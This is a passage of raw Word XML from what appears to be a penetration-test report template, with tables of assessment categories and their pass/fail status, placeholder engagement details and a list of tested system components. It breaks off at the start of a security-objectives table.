      <w:tr w:rsidR="00112BBC" w14:paraId="569AD673" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2901" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="27875A12" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerability identification and system exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0E971F5C" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Successfully completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="406AF820" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="0D21E54E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Search Engine Discovery and Reconnaissance for Information Leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6866878C" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Fails criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="0EBE9434" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="62BDBD8A" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Weak Authorization Mechanisms testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="241D2FC6" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Successfully completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="64700314" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="40483721" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Database compromising, sensitive information stealing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2D77B538" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Successfully completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="7EF73A0F" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="3832F906" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Outdated services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="16881E18" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Fails criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="01BE0BD1" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="6D7B4C41" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>S3 bucket enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2E294EBA" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Fails criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72D80705" w14:textId="5F6B9D94" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="engagement-test-info"/>
      <w:bookmarkStart w:id="28" w:name="_Toc178498964"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidRPr="00E40E14">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Engagement Test Info</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidRPr="00E40E14">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="3745" w:type="pct"/>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087"/>
        <w:gridCol w:w="4916"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="439C3901" w14:textId="77777777" w:rsidTr="00391925">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shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="64925090" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Intrusive Tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C299DEB" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Yes/No (Specify if testing involved aggressive techniques or not)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="0ABAB1FF" w14:textId="77777777" w:rsidTr="00391925">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="5B43C622" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Scan Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="52150056" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Manual/Automated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="5BBBF700" w14:textId="77777777" w:rsidTr="00391925">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="374B3371" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Audit/ Test Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5B014B8B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insert Test Type: Blackbox, Whitebox, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Graybox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54FF9D3B" w14:textId="3094F8C0" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="engagement-vectors-and-components"/>
      <w:bookmarkStart w:id="30" w:name="_Toc178498965"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidRPr="00E40E14">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Engagement Vectors and Components</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>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4647"/>
        <w:gridCol w:w="3132"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="5E0B3295" w14:textId="77777777" w:rsidTr="00EC2A0F">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244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="6D3FBF4A" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>System Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3132" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="419A7870" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Assessment Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="25CAA2D2" w14:textId="77777777" w:rsidTr="00EC2A0F">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244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="6EA06C6C" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3132" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B6C5376" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="03512F43" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="69D51AAB" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Databases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3132" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F6CFDCB" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="5E793D5B" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="5C8EE100" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Network Infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3132" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="705A97AA" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="78C764AE" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="6C33BBC6" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Firewalls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3132" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17B79477" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="3A9823C3" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="146E640B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Web Applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3132" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A00C526" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="62D77615" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="79A0CB53" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Cloud Services (AWS, Azure, Google Cloud)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3132" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28A5270A" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="0660331C" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="7EDA0075" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Virtual Machines (VMs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3132" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C5079E0" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="611A7A9B" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="33957D82" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Storage Systems (S3 buckets, file servers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3132" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08FCB0E2" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="7B3040A1" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="4FDE8877" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Internet of Things (IoT) devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3132" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2726163F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="3C11E113" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="052C6737" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Workstations and Desktops</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3132" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13804CE0" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="0FC3E078" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="14F47C7B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Mobile Devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3132" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="025847B7" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="0E35D64C" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="68871CC8" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Application Programming Interfaces (APIs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3132" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2268168D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55AE3AD4" w14:textId="42DDBF2F" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="000479B0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="Xbe848999742bec0b640a9c1c350c5f32606cba7"/>
      <w:bookmarkStart w:id="32" w:name="_Toc178498966"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidRPr="00E40E14">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Engagement Security Objectives and Principle</w:t>
      </w:r>
      <w:r w:rsidR="000479B0" w:rsidRPr="00E40E14">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="4040" w:type="pct"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6024"/>
        <w:gridCol w:w="1531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="79291323" w14:textId="77777777" w:rsidTr="00EE1BFA">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="1813B98D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Security Objectives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="47C2043A" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
